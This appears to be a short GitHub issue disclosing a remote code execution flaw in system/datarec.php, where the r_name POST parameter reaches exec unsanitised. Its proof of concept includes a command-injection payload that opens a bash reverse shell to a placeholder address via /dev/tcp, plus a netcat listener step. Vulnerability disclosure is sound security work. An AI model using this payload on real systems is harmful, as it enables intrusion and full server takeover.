We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
A RCE was found in system/datarec.php, the $_POST[r_name] is directly passed into the $mysqlstr, and is executed by exec, which causing a RCE.
$_POST[r_name]
POC: Firstly, start a nc listener:
Next, post a request with parameter: r_name=$(bash -c 'bash -i >& /dev/tcp/x.x.x.x/8888 0<&1 2>&1')
Finally, you get the reverse shell: